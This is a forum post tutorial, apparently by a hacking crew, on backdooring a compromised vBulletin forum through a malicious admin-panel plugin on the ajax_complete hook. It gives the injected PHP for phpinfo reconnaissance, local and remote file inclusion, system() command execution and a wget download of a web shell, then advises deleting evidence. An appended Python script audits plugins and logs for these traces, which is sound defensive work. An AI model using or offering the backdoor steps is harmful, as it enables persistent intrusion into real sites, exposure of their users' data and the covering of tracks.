Post Info TOPIC: Backdooring Forums After a Compromise


Backdooring Forums After a Compromise


Hey guys, today I'm gonna be showing you how to get your shell uploaded on vBulletin forums. Once you have admin access (not sure about Founder), log into your admin panel.

Usually it's something like this..

Code:
http://www.site.com/forum/admincp/


If it's not, try /admin.


Once you're logged in, you should be presented with the oh so mighty vBulletin Admin Control Panel..



Now on the left, click plugins and products, and click on Add New Plugin.


It should take you to something that looks like this.


Product: vBulletin.
Hook Location: We're going to be executing remote code through the ajax plugin, so under Hook Location, click ajax_complete.
Title: .....whatever you want to name it.
Plugin PHP Code: This is where your code is going. First we want to check the disabled functions on the server. Let's see if we can get this PHP Info to show up...
Plugin is active: No

Code:
phpinfo();


It should all look like this once you're done..


Now it should redirect you back to the plugins manager. If there's any plugins active under the ajax plugin, uncheck them and make sure yours is active. Scroll down and click "Save Active Status".

Should look something like this...


Now save it, and go to your ajax page.

Code:
http://www.site.com/forum/ajax.php

 



Local File Inclusion
allow_url_fopen = On
That means we can create a Local File Inclusion vulnerability.

Code:
include($_GET[LFI])

 

 

Code:
http://www.site.com/forum/ajax.php?LFI=/proc/self/status

 


Now you can poison logs, dig up juicy files, or use another method of LFI to get your shell up.


Remote File Inclusion

allow_url_include = Off
That means we can't create an RFI vulnerability until we get our shell up..

If we could, it would be almost the same thing as LFI.

Code:
include($_GET[RFI])

 

Code:
http://www.site.com/forum/ajax.php?RFI=http://www.site.com/shell.txt?



Remote Code Execution
Now, if any of these are disabled, you're going to have some trouble. If not, we can get our shell up using unix commands.

Code:
system
exec
shell_exec
passthru

 

Code:
system('ls');

That's a unix command to list files, now see if it worked..

Code:
http://www.site.com/forum/ajax.php

You should see all the files in the current directory.

Woot, site pwnt. Now you can use wget to get your shell uploaded..

Code:
system('wget http://www.site.com/shell.txt -O shell.php');

 

 

Code:
http://www.site.com/forum/shell.php

 


Game, there you go. Now you can activate the default plugin and delete your evidence.
Shoutout to the rest of Team Intra and my boys in Zer0Lulz for making this possible.



__________________
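For administrators checking a forum for the tampering described in this post, here is an added example that is not part of the original post: it audits exported plugin rows for the PHP constructs shown above and flags ajax.php requests whose parameters carry a path or URL. The tuple layout of the plugin export, the function names and the sample data are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP constructs the post plants in a plugin: command execution,
# include/require fed from request data, and phpinfo() reconnaissance.
PLUGIN_RULES = {
    "command_exec": re.compile(r"\b(system|exec|shell_exec|passthru)\s*\(", re.I),
    "request_include": re.compile(r"\b(include|require)(_once)?\b[^;]*\$_(GET|POST|REQUEST|COOKIE)", re.I),
    "phpinfo": re.compile(r"\bphpinfo\s*\(", re.I),
}

def audit_plugins(rows):
    """Return (title, hook, active, matched rules) for each suspicious plugin row."""
    findings = []
    for title, hook, active, code in rows:
        hits = sorted(n for n, rx in PLUGIN_RULES.items() if rx.search(code))
        if hits:
            findings.append((title, hook, bool(active), hits))
    # Active plugins first: they run on every request that reaches their hook.
    return sorted(findings, key=lambda f: (not f[2], f[0]))

REQUEST_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Parameter values that look like a filesystem path or a URL.
PATH_OR_URL = re.compile(r"^(?:/|\.\.?/|[a-z][a-z0-9+.-]*://)", re.I)

def suspicious_ajax_requests(log_lines):
    """Return (path, parameter names) for ajax.php requests carrying path/URL values."""
    hits = []
    for line in log_lines:
        m = REQUEST_RX.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/ajax.php"):
            continue
        names = [k for k, v in parse_qsl(url.query, keep_blank_values=True)
                 if PATH_OR_URL.match(v)]
        if names:
            hits.append((url.path, names))
    return hits

# Constructed sample data: (title, hook, active, PHP code) rows and access-log lines.
SAMPLE_ROWS = [
    ("sitemap flag", "global_start", 1, "$show['sitemap'] = true;"),
    ("cache helper", "ajax_complete", 1, "include($_GET[LFI])"),
    ("stats", "ajax_complete", 0, "system('ls');"),
]
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /forum/ajax.php?do=usersearch HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /forum/ajax.php?LFI=/proc/self/status HTTP/1.1" 200 901',
]
```

A match is a lead to review, not proof of compromise: legitimate plugins can call these functions, so compare findings against the plugins you installed yourself.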